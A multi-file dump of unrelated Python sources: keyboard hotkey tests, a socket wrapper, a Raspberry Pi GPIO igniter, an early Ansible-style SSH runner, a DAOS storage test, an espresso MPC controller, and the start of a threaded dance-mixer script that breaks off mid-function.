self.assertTrue(all(keyboard._listener.blocking_hotkeys.values()))
self.assertTrue(all(keyboard._listener.filtered_modifiers.values()))
self.assertNotEqual(keyboard._hotkeys, {})
remove()
self.assertTrue(not any(keyboard._listener.filtered_modifiers.values()))
self.assertTrue(not any(keyboard._listener.blocking_hotkeys.values()))
self.assertEqual(keyboard._hotkeys, {})
def test_remove_hotkey_internal_multistep_end(self):
remove = keyboard.add_hotkey('shift+a, b', trigger, suppress=True)
self.do(d_shift+du_a+u_shift)
self.assertTrue(any(keyboard._listener.blocking_hotkeys.values()))
self.assertTrue(not any(keyboard._listener.filtered_modifiers.values()))
self.assertNotEqual(keyboard._hotkeys, {})
remove()
self.assertTrue(not any(keyboard._listener.filtered_modifiers.values()))
self.assertTrue(not any(keyboard._listener.blocking_hotkeys.values()))
self.assertEqual(keyboard._hotkeys, {})
def test_add_hotkey_single_step_suppress_with_modifiers(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
self.do(d_ctrl+d_shift+d_a, triggered_event)
def test_add_hotkey_single_step_suppress_with_modifiers_fail_unrelated_modifier(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
self.do(d_ctrl+d_shift+u_shift+d_a, d_shift+u_shift+d_ctrl+d_a)
def test_add_hotkey_single_step_suppress_with_modifiers_fail_unrelated_key(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
self.do(d_ctrl+d_shift+du_b, d_shift+d_ctrl+du_b)
def test_add_hotkey_single_step_suppress_with_modifiers_unrelated_key(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
self.do(d_ctrl+d_shift+du_b+d_a, d_shift+d_ctrl+du_b+triggered_event)
def test_add_hotkey_single_step_suppress_with_modifiers_release(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
self.do(d_ctrl+d_shift+du_b+d_a+u_ctrl+u_shift, d_shift+d_ctrl+du_b+triggered_event+u_ctrl+u_shift)
def test_add_hotkey_single_step_suppress_with_modifiers_out_of_order(self):
keyboard.add_hotkey('ctrl+shift+a', trigger, suppress=True)
self.do(d_shift+d_ctrl+d_a, triggered_event)
def test_add_hotkey_single_step_suppress_with_modifiers_repeated(self):
keyboard.add_hotkey('ctrl+a', trigger, suppress=True)
self.do(d_ctrl+du_a+du_b+du_a, triggered_event+d_ctrl+du_b+triggered_event)
def test_add_hotkey_single_step_suppress_with_modifiers_release(self):
keyboard.add_hotkey('ctrl+a', trigger, suppress=True, trigger_on_release=True)
self.do(d_ctrl+du_a+du_b+du_a, triggered_event+d_ctrl+du_b+triggered_event)
def test_add_hotkey_single_step_suppress_with_modifier_superset_release(self):
keyboard.add_hotkey('ctrl+a', trigger, suppress=True, trigger_on_release=True)
self.do(d_ctrl+d_shift+du_a+u_shift+u_ctrl, d_ctrl+d_shift+du_a+u_shift+u_ctrl)
def test_add_hotkey_single_step_suppress_with_modifier_superset(self):
keyboard.add_hotkey('ctrl+a', trigger, suppress=True)
self.do(d_ctrl+d_shift+du_a+u_shift+u_ctrl, d_ctrl+d_shift+du_a+u_shift+u_ctrl)
def test_add_hotkey_single_step_timeout(self):
keyboard.add_hotkey('a', trigger, timeout=1, suppress=True)
self.do(du_a, triggered_event)
def test_add_hotkey_multi_step_first_timeout(self):
keyboard.add_hotkey('a, b', trigger, timeout=0.01, suppress=True)
time.sleep(0.03)
self.do(du_a+du_b, triggered_event)
def test_add_hotkey_multi_step_last_timeout(self):
keyboard.add_hotkey('a, b', trigger, timeout=0.01, suppress=True)
self.do(du_a, [])
time.sleep(0.05)
self.do(du_b, du_a+du_b)
def test_add_hotkey_multi_step_success_timeout(self):
keyboard.add_hotkey('a, b', trigger, timeout=0.05, suppress=True)
self.do(du_a, [])
time.sleep(0.01)
self.do(du_b, triggered_event)
def test_add_hotkey_multi_step_suffix_timeout(self):
keyboard.add_hotkey('a, b, a', trigger, timeout=0.01, suppress=True)
self.do(du_a+du_b, [])
time.sleep(0.05)
self.do(du_a, du_a+du_b)
self.do(du_b+du_a, triggered_event)
def test_add_hotkey_multi_step_allow(self):
keyboard.add_hotkey('a, b', lambda: trigger() or True, suppress=True)
self.do(du_a+du_b, triggered_event+du_a+du_b)
def test_add_hotkey_single_step_nonsuppress(self):
queue = keyboard._queue.Queue()
keyboard.add_hotkey('ctrl+shift+a+b', lambda: queue.put(True), suppress=False)
self.do(d_shift+d_ctrl+d_a+d_b)
self.assertTrue(queue.get(timeout=0.5))
def test_add_hotkey_single_step_nonsuppress_repeated(self):
queue = keyboard._queue.Queue()
keyboard.add_hotkey('ctrl+shift+a+b', lambda: queue.put(True), suppress=False)
self.do(d_shift+d_ctrl+d_a+d_b)
self.do(d_shift+d_ctrl+d_a+d_b)
self.assertTrue(queue.get(timeout=0.5))
self.assertTrue(queue.get(timeout=0.5))
def test_add_hotkey_single_step_nosuppress_with_modifiers_out_of_order(self):
queue = keyboard._queue.Queue()
keyboard.add_hotkey('ctrl+shift+a', lambda: queue.put(True), suppress=False)
self.do(d_shift+d_ctrl+d_a)
self.assertTrue(queue.get(timeout=0.5))
def test_add_hotkey_single_step_suppress_regression_1(self):
keyboard.add_hotkey('a', trigger, suppress=True)
self.do(d_c+d_a+u_c+u_a, d_c+d_a+u_c+u_a)
def test_remap_hotkey_single(self):
keyboard.remap_hotkey('a', 'b')
self.do(d_a+u_a, d_b+u_b)
def test_remap_hotkey_complex_dst(self):
keyboard.remap_hotkey('a', 'ctrl+b, c')
self.do(d_a+u_a, d_ctrl+du_b+u_ctrl+du_c)
def test_remap_hotkey_modifiers(self):
keyboard.remap_hotkey('ctrl+shift+a', 'b')
self.do(d_ctrl+d_shift+d_a+u_a, du_b)
def test_remap_hotkey_modifiers_repeat(self):
keyboard.remap_hotkey('ctrl+shift+a', 'b')
self.do(d_ctrl+d_shift+du_a+du_a, du_b+du_b)
def test_remap_hotkey_modifiers_state(self):
keyboard.remap_hotkey('ctrl+shift+a', 'b')
self.do(d_ctrl+d_shift+du_c+du_a+du_a, d_shift+d_ctrl+du_c+u_shift+u_ctrl+du_b+d_ctrl+d_shift+u_shift+u_ctrl+du_b+d_ctrl+d_shift)
def test_remap_hotkey_release_incomplete(self):
keyboard.remap_hotkey('a', 'b', trigger_on_release=True)
self.do(d_a, [])
def test_remap_hotkey_release_complete(self):
keyboard.remap_hotkey('a', 'b', trigger_on_release=True)
self.do(du_a, du_b)
def test_parse_hotkey_combinations_scan_code(self):
self.assertEqual(keyboard.parse_hotkey_combinations(30), (((30,),),))
def test_parse_hotkey_combinations_single(self):
self.assertEqual(keyboard.parse_hotkey_combinations('a'), (((1,),),))
def test_parse_hotkey_combinations_single_modifier(self):
self.assertEqual(keyboard.parse_hotkey_combinations('shift+a'), (((1, 5), (1, 6)),))
def test_parse_hotkey_combinations_single_modifiers(self):
self.assertEqual(keyboard.parse_hotkey_combinations('shift+ctrl+a'), (((1, 5, 7), (1, 6, 7)),))
def test_parse_hotkey_combinations_multi(self):
self.assertEqual(keyboard.parse_hotkey_combinations('a, b'), (((1,),), ((2,),)))
def test_parse_hotkey_combinations_multi_modifier(self):
self.assertEqual(keyboard.parse_hotkey_combinations('shift+a, b'), (((1, 5), (1, 6)), ((2,),)))
def test_parse_hotkey_combinations_list_list(self):
self.assertEqual(keyboard.parse_hotkey_combinations(keyboard.parse_hotkey_combinations('a, b')), keyboard.parse_hotkey_combinations('a, b'))
def test_parse_hotkey_combinations_fail_empty(self):
with self.assertRaises(ValueError):
keyboard.parse_hotkey_combinations('')
def test_add_hotkey_multistep_suppress_incomplete(self):
keyboard.add_hotkey('a, b', trigger, suppress=True)
self.do(du_a, [])
self.assertEqual(keyboard._listener.blocking_hotkeys[(1,)], [])
self.assertEqual(len(keyboard._listener.blocking_hotkeys[(2,)]), 1)
def test_add_hotkey_multistep_suppress_incomplete(self):
keyboard.add_hotkey('a, b', trigger, suppress=True)
self.do(du_a+du_b, triggered_event)
def test_add_hotkey_multistep_suppress_modifier(self):
keyboard.add_hotkey('shift+a, b', trigger, suppress=True)
self.do(d_shift+du_a+u_shift+du_b, triggered_event)
def test_add_hotkey_multistep_suppress_fail(self):
keyboard.add_hotkey('a, b', trigger, suppress=True)
self.do(du_a+du_c, du_a+du_c)
def test_add_hotkey_multistep_suppress_three_steps(self):
keyboard.add_hotkey('a, b, c', trigger, suppress=True)
self.do(du_a+du_b+du_c, triggered_event)
def test_add_hotkey_multistep_suppress_repeated_prefix(self):
keyboard.add_hotkey('a, a, c', trigger, suppress=True, trigger_on_release=True)
self.do(du_a+du_a+du_c, triggered_event)
def test_add_hotkey_multistep_suppress_repeated_key(self):
keyboard.add_hotkey('a, b', trigger, suppress=True)
self.do(du_a+du_a+du_b, du_a+triggered_event)
self.assertEqual(keyboard._listener.blocking_hotkeys[(2,)], [])
self.assertEqual(len(keyboard._listener.blocking_hotkeys[(1,)]), 1)
def test_add_hotkey_multi_step_suppress_regression_1(self):
keyboard.add_hotkey('a, b', trigger, suppress=True)
self.do(d_c+d_a+u_c+u_a+du_c, d_c+d_a+u_c+u_a+du_c)
def test_add_hotkey_multi_step_suppress_replays(self):
keyboard.add_hotkey('a, b, c', trigger, suppress=True)
self.do(du_a+du_b+du_a+du_b+du_space, du_a+du_b+du_a+du_b+du_space)
def test_add_word_listener_success(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free)
self.do(du_a+du_b+du_c+du_space)
self.assertTrue(queue.get(timeout=0.5))
def test_add_word_listener_no_trigger_fail(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free)
self.do(du_a+du_b+du_c)
with self.assertRaises(keyboard._queue.Empty):
queue.get(timeout=0.01)
def test_add_word_listener_timeout_fail(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free, timeout=1)
self.do(du_a+du_b+du_c+[make_event(KEY_DOWN, name='space', time=2)])
with self.assertRaises(keyboard._queue.Empty):
queue.get(timeout=0.01)
def test_duplicated_word_listener(self):
keyboard.add_word_listener('abc', trigger)
keyboard.add_word_listener('abc', trigger)
def test_add_word_listener_remove(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free)
keyboard.remove_word_listener('abc')
self.do(du_a+du_b+du_c+du_space)
with self.assertRaises(keyboard._queue.Empty):
queue.get(timeout=0.01)
def test_add_word_listener_suffix_success(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free, match_suffix=True)
self.do(du_a+du_a+du_b+du_c+du_space)
self.assertTrue(queue.get(timeout=0.5))
def test_add_word_listener_suffix_fail(self):
queue = keyboard._queue.Queue()
def free():
queue.put(1)
keyboard.add_word_listener('abc', free)
self.do(du_a+du_a+du_b+du_c)
with self.assertRaises(keyboard._queue.Empty):
queue.get(timeout=0.01)
#def test_add_abbreviation(self):
# keyboard.add_abbreviation('abc', 'aaa')
# self.do(du_a+du_b+du_c+du_space, [])
if __name__ == '__main__':
unittest.main()
|
utils.py
|
import json
import base64
import threading
import serializer
from socket import *
from events import EmitterAsync
def _recv(self):
buffer = b""
while self.mode == "client":
packet = b""
try:
packet = socket.recv(self, 1024)
except Exception as e:
if self.mode == "closed":
return None
else:
raise e
buffer += packet
if len(packet) > 0:
if packet.endswith("\r\n".encode()):
buffer = buffer.rsplit("\r\n".encode(), 1)[0]
try:
data = serializer.loads(buffer.decode())
if "type" in data and data["type"] == "event":
EmitterAsync.emit(self, data["name"], *data["data"])
else:
if data["type"] in ["str", "int", "float", "bool"]:
EmitterAsync.emit(self, "data", data["data"])
elif data["type"] in ["list", "dict", "tuple"]:
EmitterAsync.emit(self, "data", data["data"])
elif data["type"] == "tuple":
EmitterAsync.emit(self, "data", data["data"])
elif data["type"] == "bytes":
EmitterAsync.emit(self, "data", base64.b64decode(data["data"].encode()))
elif data["type"] == "complex":
EmitterAsync.emit(self, "data", complex(data["data"]))
except Exception:
EmitterAsync.emit(self, "data", buffer)
buffer = b""
else:
self.close()
class Socket2(socket, EmitterAsync):
def __init__(self, family=-1, type=-1, proto=-1, fileno=None):
self.mode = "base"
EmitterAsync.__init__(self)
socket.__init__(self, family, type, proto, fileno)
if fileno:
self.mode = "client"
threading.Thread(target=_recv, args=[self]).start()
def accept(self):
fd, addr = super()._accept()
sock = Socket2(self.family, self.type, self.proto, fd)
return sock, addr
def connect(self, address):
socket.connect(self, address)
self.mode = "client"
threading.Thread(target=_recv, args=[self]).start()
def send(self, data):
if type(data) == bytes:
data = {
"type": "bytes",
"data": base64.b64encode(data).decode()
}
elif type(data) in [list, tuple]:
data = {
"type": type(data).__name__,
"data": data
}
elif type(data) == dict:
if "type" in data:
if data["type"] == "event":
pass
else:
data = {
"type": "dict",
"data": data
}
elif type(data) == complex:
data = {
"type": "complex",
"data": str(data)
}
elif type(data) in [int, float, str, bool]:
data = {
"type": type(data).__name__,
"data": data
}
else:
raise TypeError("Este tipo de dados não é suportado!")
socket.sendall(self, (serializer.dumps(data) + "\r\n").encode())
def emit(self, event, *data):
return self.sendall({
"type": "event",
"name": event,
"data": list(data)
})
def sendall(self, data):
self.send(data)
def close(self):
if not self.mode == "closed":
self.mode = "closed"
socket.close(self)
EmitterAsync.emit(self, "close")
|
Igniter.py
|
"""
Ethan Armstrong
warmst@uw.edu
Implements the Igniter class
"""
import RPi.GPIO as GPIO
import time
from multiprocessing import Process
class Igniter():
"""
Igniter object, capable of sending a pulse down a specified GPIO pin on a raspberry pi
"""
def __init__(this, pin):
"""
Igniter(pin) | creates a new Igniter object on a given pin\n
pin | the pin, in board mode to send a gate signal
"""
GPIO.setmode(GPIO.BOARD)
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin,False)
this._pin = pin
def ignite_sync(this, on_time=1):
"""
ignite_sync(on_time) | ignites the connected charge while blocking for on_time seconds\n
on_time | the time to keep the circuit closed for (seconds), default : 1
"""
this._pulse(this._pin, on_time)
def ignite(this,on_time=1):
"""
ignite(on_time) | ignited the connected charge for on_time time in a background task\n
on_time | the time to keep the circuit closed for (seconds), default : 1
"""
p = Process(target=this._pulse, args=[this._pin,on_time])
p.start()
@staticmethod
def _pulse(pin, on_time=1):
"""
_pulse(pin, on_time=1) | a class independent private method to handle a generic pulse event on the set pin\n
pin | the pin to pulse on or off (board mode)\n
on_time | the time to keep the circuit closed (seconds) default : 1
"""
GPIO.output(pin, True)
time.sleep(on_time)
GPIO.output(pin, False)
if "__main__" in __name__:
ig = Igniter(11)
ig.ignite()
|
__init__.py
|
# -*- coding: utf-8 -*-
# core
from optparse import OptionParser
import fnmatch
from multiprocessing import Process, Pipe
from itertools import izip
import os
import json
# non-core
import paramiko
DEFAULT_HOST_LIST = '~/.ansible_hosts' #ansible的hosts配置
DEFAULT_MODULE_PATH = '~/ansible' #外置模块存放目录
DEFAULT_MODULE_NAME = 'ping' #默认模块
DEFAULT_PATTERN = '*' #host的匹配规则
DEFAULT_FORKS = 3 #并发数目
DEFAULT_MODULE_ARGS = '' #默认参数
class Pooler(object):
"""
并发的执行 函数 和 参数,并且返回结果都可以返回
ansible 使用这个特性,来并发执行命令
要想理解下面代码,请参看
multiprocessing 中 Process, Pipe
itertools 中 izip
下面注释的连接是此代码的出处:
"""
# credit: http://stackoverflow.com/questions/3288595/multiprocessing-using-pool-map-on-a-function-defined-in-a-class
@classmethod
def spawn(cls, f):
def fun(pipe,x):
pipe.send(f(x))
pipe.close()
return fun
@classmethod
def parmap(cls, f, X):
pipe=[Pipe() for x in X]
proc=[Process(target=cls.spawn(f),args=(c,x)) for x,(p,c) in izip(X,pipe)]
[p.start() for p in proc]
[p.join() for p in proc]
return [p.recv() for (p,c) in pipe]
class Cli(object):
def __init__(self):
pass
def runner(self):
parser = OptionParser()
parser.add_option("-H", "--host-list", dest="host_list",
help="path to hosts list", default=DEFAULT_HOST_LIST)
parser.add_option("-L", "--library", dest="module_path",
help="path to module library", default=DEFAULT_MODULE_PATH)
parser.add_option("-F", "--forks", dest="forks",
help="level of parallelism", default=DEFAULT_FORKS)
parser.add_option("-n", "--name", dest="module_name",
help="module name to execute", default=DEFAULT_MODULE_NAME)
parser.add_option("-a", "--args", dest="module_args",
help="module arguments", default=DEFAULT_MODULE_ARGS)
parser.add_option("-p", "--pattern", dest="pattern",
help="hostname pattern", default=DEFAULT_PATTERN)
#如上实现脚本参数指定
options, args = parser.parse_args()
host_list = self._host_list(options.host_list)
return Runner(
module_name=options.module_name,
module_path=options.module_path,
module_args=options.module_args,
host_list=host_list,
forks=options.forks,
pattern=options.pattern,
)
def _host_list(self, host_list):
host_list = os.path.expanduser(host_list)
return file(host_list).read().split("\n")
class Runner(object):
def __init__(self, host_list=[], module_path=None,
module_name=None, module_args='',
forks=3, timeout=60, pattern='*'):
self.host_list = host_list
self.module_path = module_path
self.module_name = module_name
self.forks = forks
self.pattern = pattern
self.module_args = module_args
self.timeout = timeout
def _matches(self, host_name):
if host_name == '':
return False
if fnmatch.fnmatch(host_name, self.pattern):
return True
return False
def _connect(self, host):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(host, username='root',
allow_agent=True, look_for_keys=True)
return ssh
except:
return None
def _executor(self, host):
# TODO: try/catch returning none
conn = self._connect(host)
if not conn:
return [ host, None ]
outpath = self._copy_module(conn)
self._exec_command(conn, "chmod +x %s" % outpath)
cmd = self._command(outpath)
result = self._exec_command(conn, cmd)
result = json.loads(result)
return [ host, result ]
def _command(self, outpath):
cmd = "%s %s" % (outpath, self.module_args)
return cmd
def _exec_command(self, conn, cmd):
stdin, stdout, stderr = conn.exec_command(cmd)
results = stdout.read()
return results
def _copy_module(self, conn):
inpath = os.path.expanduser(os.path.join(self.module_path, self.module_name))
outpath = os.path.join("/var/spool/", "ansible_%s" % self.module_name)
ftp = conn.open_sftp()
ftp.put(inpath, outpath)
ftp.close()
return outpath
def run(self):
hosts = [ h for h in self.host_list if self._matches(h) ]
def executor(x):
return self._executor(x)
results = Pooler.parmap(executor, hosts)
by_host = dict(results)
return by_host
if __name__ == '__main__':
# comamnd line usage example:
result = Cli().runner().run()
print json.dumps(result, sort_keys=True, indent=4)
# API usage example:
#r = Runner(
# host_list = [ '127.0.0.1' ],
# module_path='~/.ansible',
# module_name='ping',
# module_args='',
# pattern='*',
# forks=3
#)
#print r.run()
"""
fnmatch unix文件匹配模块
import fnmatch
import os
for file in os.listdir('.'):
if fnmatch.fnmatch(file, '*.txt'):
print file
----output
cc.txt
requirements.txt
contributors.txt
"""
|
global_handle.py
|
#!/usr/bin/python
'''
(C) Copyright 2018-2019 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Governments rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
'''
from __future__ import print_function
import os
import traceback
import json
from apricot import TestWithServers
import check_for_pool
from daos_api import DaosContext, DaosPool, DaosContainer, DaosApiError
def check_handle(buf_len, iov_len, buf, uuidstr, rank):
"""
This gets run in a child process and verifyes the global
handle can be turned into a local handle in another process.
"""
try:
# get paths from the build_vars generated by build
with open('../../../.build_vars.json') as build_file:
build_paths = json.load(build_file)
# setup the DAOS python API in this process
context = DaosContext(build_paths['PREFIX'] + '/lib/')
pool = DaosPool(context)
pool.set_uuid_str(uuidstr)
pool.set_svc(rank)
pool.group = "daos_server"
# note that the handle is stored inside the pool as well
dummy_local_handle = pool.global2local(context, iov_len, buf_len, buf)
# perform some operations that will use the new handle
pool.pool_query()
container = DaosContainer(context)
container.create(pool.handle)
except DaosApiError as excep:
print(excep)
print(traceback.format_exc())
raise
return
class GlobalHandle(TestWithServers):
"""
This class contains tests to verify the ability to share pool
handles amoung processes.
:avocado: recursive
"""
def tearDown(self):
try:
super(GlobalHandle, self).tearDown()
finally:
# really make sure everything is gone
check_for_pool.cleanup_pools(self.hostlist_servers)
def test_global_handle(self):
"""
Test ID: DAO
Test Description: Use a pool handle in another process.
:avocado: tags=pool,poolhandle,vm,small,regression
"""
try:
# use the uid/gid of the user running the test, these should
# be perfectly valid
createuid = os.geteuid()
creategid = os.getegid()
# parameters used in pool create that are in yaml
createmode = self.params.get("mode", '/run/testparams/createmode/')
createsetid = self.params.get("setname",
'/run/testparams/createset/')
createsize = self.params.get("size", '/run/testparams/createsize/')
# initialize a python pool object then create the underlying
# daos storage
pool = DaosPool(self.context)
pool.create(createmode, createuid, creategid,
createsize, createsetid, None)
pool.connect(1 << 1)
# create a container just to make sure handle is good
container = DaosContainer(self.context)
container.create(pool.handle)
# create a global handle
iov_len, buf_len, buf = pool.local2global()
# this should work in the future but need on-line server addition
#arg_list = (buf_len, iov_len, buf, pool.get_uuid_str(), 0)
#p = Process(target=check_handle, args=arg_list)
#p.start()
#p.join()
# for now verifying global handle in the same process which is not
# the intended use case
check_handle(buf_len, iov_len, buf, pool.get_uuid_str(), 0)
except DaosApiError as excep:
print(excep)
print(traceback.format_exc())
self.fail("Expecting to pass but test has failed.\n")
|
espresso-mpc.py
|
#!/usr/bin/python
def he_control_loop(dummy, state):
from time import sleep
from datetime import datetime, timedelta
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setup(conf.he_pin, GPIO.OUT)
GPIO.output(conf.he_pin,0)
try:
while True:
control_signal = state['control_signal']
# PWM to control heating element
if control_signal >= 100:
GPIO.output(conf.he_pin,1)
sleep(conf.sample_time)
elif control_signal > 0 and control_signal < 100:
GPIO.output(conf.he_pin,1)
sleep(conf.sample_time*control_signal/100.)
GPIO.output(conf.he_pin,0)
sleep(conf.sample_time*(1-(control_signal/100.)))
else:
GPIO.output(conf.he_pin,0)
sleep(conf.sample_time)
finally:
GPIO.output(conf.he_pin,0)
GPIO.cleanup()
def control_loop(dummy,state):
import sys
import pickle
from time import sleep, time, ctime
import math
import RPi.GPIO as GPIO
import config as conf
import numpy
from cvxopt import matrix
from cvxopt import solvers
import mpc_matrices
import timer
import Adafruit_GPIO.SPI as SPI
import Adafruit_MAX31855.MAX31855 as MAX31855
sensor = MAX31855.MAX31855(spi=SPI.SpiDev(conf.spi_port, conf.spi_dev))
lasttime = time()
lastsettemp = state['settemp']
setsteamtemp = state['setsteamtemp']
GPIO.setmode(GPIO.BCM)
GPIO.setup(conf.brew_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(conf.steam_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
brew_state_prev = GPIO.input(conf.brew_pin)
steam_state_prev = GPIO.input(conf.steam_pin)
mpc_mat_brew = mpc_matrices.mpc_matrices(lastsettemp, conf.T_s)
mpc_mat_steam = mpc_matrices.mpc_matrices(setsteamtemp, conf.T_s)
mpc_mat = mpc_mat_brew
A = mpc_mat['A']
B = mpc_mat['B']
B2 = mpc_mat['B2']
u = 0 # Control signal
u_I = 0 # Integral control
n = conf.n
dt = conf.sample_time
tempc = sensor.readTempC()
tempc_prev = tempc
y = tempc - lastsettemp
x = numpy.mat([[y + 3.3], [y]]) # current state
x_prev = numpy.mat([[y + 3.3], [y]]) # previous state
try:
while True:
settemp = state['settemp']
tempc = sensor.readTempC()
if math.isnan(tempc):
tempc = tempc_prev
if abs(tempc - tempc_prev) > 100:
tempc = tempc_prev
tempc_prev = tempc
# If steam button pressed, change setpoint temperature and observer gain
steam_state = GPIO.input(conf.steam_pin)
if steam_state:
state['settemp'] = state['settemp_orig']
K = conf.K_brew
mpc_mat = mpc_mat_brew
else:
state['settemp'] = state['setsteamtemp']
K = conf.K_steam
mpc_mat = mpc_mat_steam
if steam_state != steam_state_prev:
A = mpc_mat['A']
B = mpc_mat['B']
B2 = mpc_mat['B2']
steam_state_prev = steam_state
if state['settemp'] != lastsettemp :
# Change state instantaneously (by-pass filter)
settemp = state['settemp']
x = x - numpy.mat([[settemp], [settemp]]) + numpy.mat([[lastsettemp], [lastsettemp]])
x_prev = x
lastsettemp = state['settemp']
if settemp > 125:
T_s = conf.T_s_high
else:
T_s = conf.T_s
y = tempc - settemp
# Observer
y_tilde = x_prev.item(1,0)
# If brewing, add feed forward control and change observer
brew_state = GPIO.input(conf.brew_pin)
if brew_state: # Not brewing
x = A*x_prev + B*u + B2 + K*conf.sample_time*(y - y_tilde)*numpy.mat('1; 1')
d_1vec = numpy.zeros((n,1))
else: # Brewing
x = A*x_prev + B*(u - conf.brew_boost) + B2 + K*conf.sample_time*(y - y_tilde)*numpy.mat('1; 1')
d_1vec = -numpy.ones((n,1))*conf.brew_boost
x_prev = x
# Check if timer is on
awake = timer.timer(state)
if awake:
# Equality constraint
if brew_state:
b_constr = mpc_mat['A_app']*x + mpc_mat['b_constr']
else:
b_constr = mpc_mat['A_app']*x + mpc_mat['b_constr_brew']
b_opt = matrix(b_constr, tc='d')
# Invoke solver
solvers.options['show_progress'] = False
sol = solvers.lp(mpc_mat['q_opt'], mpc_mat['G_opt'], mpc_mat['h_opt'], mpc_mat['A_opt'], b_opt, solver='cvxopt')
x_opt = numpy.array(sol['x'])
u_mpc = x_opt[2*n,0] # Only use first control signal
# Integral control, only if not steaming
if steam_state:
u_I = u_I - dt*conf.K_I*x.item(1,0)
if u_I > conf.u_I_max:
u_I = conf.u_I_max
elif u_I < -conf.u_I_max:
u_I = -conf.u_I_max
if steam_state:
u = u_mpc + u_I
else:
u = u_mpc
if u < 0:
u = 0
elif u > 100:
u = 100
else:
u = 0
state['awake'] = awake
state['tempc'] = round(x.item(1,0) + settemp,2)
state['control_signal'] = round(u,2)
time1 = time()
time2 = math.ceil(time1)%60
if time2 == 0:
with open('/root/espresso-mpc/objs.pickle', 'wb') as fw:
pickle.dump([state['settemp'], state['settemp_orig'], state['setsteamtemp'], state['TimerOnMo'], state['TimerOffMo'], state['TimerOnTu'], state['TimerOffTu'], state['TimerOnWe'], state['TimerOffWe'], state['TimerOnTh'], state['TimerOffTh'], state['TimerOnFr'], state['TimerOffFr'], state['TimerOnSa'], state['TimerOffSa'], state['TimerOnSu'], state['TimerOffSu']],fw)
exec_time = time1 - lasttime
print 'Exec. time:', str(exec_time), 'Temperature:', state['tempc'], 'Control signal:', state['control_signal'], 'Integral control:', round(u_I, 2), 'Awake:', str(awake), 'Temp. setpoint:', str(settemp), 'y:', str(round(x.item(1,0),2))
sleeptime = lasttime + conf.sample_time - time()
if sleeptime < 0 :
sleeptime = 0
sleep(sleeptime)
lasttime = time()
finally:
GPIO.cleanup()
if __name__ == '__main__':
from multiprocessing import Process, Manager
from time import sleep
from urllib2 import urlopen
import config as conf
import pickle
import rest_server as rest_server
manager = Manager()
state = manager.dict()
state['control_signal'] = 0
state['awake'] = False
# Read states
try:
with open('/root/espresso-mpc/objs.pickle') as fr:
[state['settemp'], state['settemp_orig'], state['setsteamtemp'], state['TimerOnMo'], state['TimerOffMo'], state['TimerOnTu'], state['TimerOffTu'], state['TimerOnWe'], state['TimerOffWe'], state['TimerOnTh'], state['TimerOffTh'], state['TimerOnFr'], state['TimerOffFr'], state['TimerOnSa'], state['TimerOffSa'], state['TimerOnSu'], state['TimerOffSu']] = pickle.load(fr)
except:
state['settemp'] = conf.settemp
state['settemp_orig'] = conf.settemp
state['setsteamtemp'] = conf.setsteamtemp
state['TimerOnMo'] = conf.TimerOnMo
state['TimerOffMo'] = conf.TimerOffMo
state['TimerOnTu'] = conf.TimerOnTu
state['TimerOffTu'] = conf.TimerOffTu
state['TimerOnWe'] = conf.TimerOnWe
state['TimerOffWe'] = conf.TimerOffWe
state['TimerOnTh'] = conf.TimerOnTh
state['TimerOffTh'] = conf.TimerOffTh
state['TimerOnFr'] = conf.TimerOnFr
state['TimerOffFr'] = conf.TimerOffFr
state['TimerOnSa'] = conf.TimerOnSa
state['TimerOffSa'] = conf.TimerOffSa
state['TimerOnSu'] = conf.TimerOnSu
state['TimerOffSu'] = conf.TimerOffSu
p = Process(target=control_loop,args=(1,state))
p.daemon = True
p.start()
h = Process(target=he_control_loop,args=(1,state))
h.daemon = True
h.start()
r = Process(target=rest_server.rest_server,args=(1,state))
r.daemon = True
r.start()
while p.is_alive() and h.is_alive() and r.is_alive():
sleep(0.1)
|
2_dance_mixer.py
|
from __future__ import print_function
from threading import Semaphore, Lock, Thread
from collections import deque
import random
from time import sleep
import time
from timeit import Timer
import itertools
import sys
import logging
#L = int(input('Number of Leaders:'))
#F = int(input('Number of Followers:'))
L = int(sys.argv[1])
F = int(sys.argv[2])
#-----Global Variables-----------
#append right and pop left, FIFO
leaders_line = deque()
followers_line = deque()
dancing = deque([0,0]) #pair of all current dancing couples
leaders_on_floor = deque()
followers_on_floor = deque()
for i in range(0,L):
leaders_line.append(i)
for i in range(0,F):
followers_line.append(i)
floor_counter = 0
can_dance = False
can_enter = False
changing = False
bandwaiting = False
music_lockby_end = False
init = True
rng = random.Random()
rng.seed(100)
#--------------------------------
mutex = Semaphore(1)
Leaders_lock = Semaphore(0)
Follower_lock = Semaphore(0)
leader_wait = [Semaphore(0)]*L
follower_wait = [Semaphore(0)]*F
#------Bandleaders---------------
def startmusic(music):
global can_enter
global can_dance
global leader_wait
global follower_wait
can_enter = True
can_dance = True
print ("** Band leader started playing ",music," **")
#while there are players locked, release them
#don't need to go through this hussle for the first time
#need release for later
if (init == False):
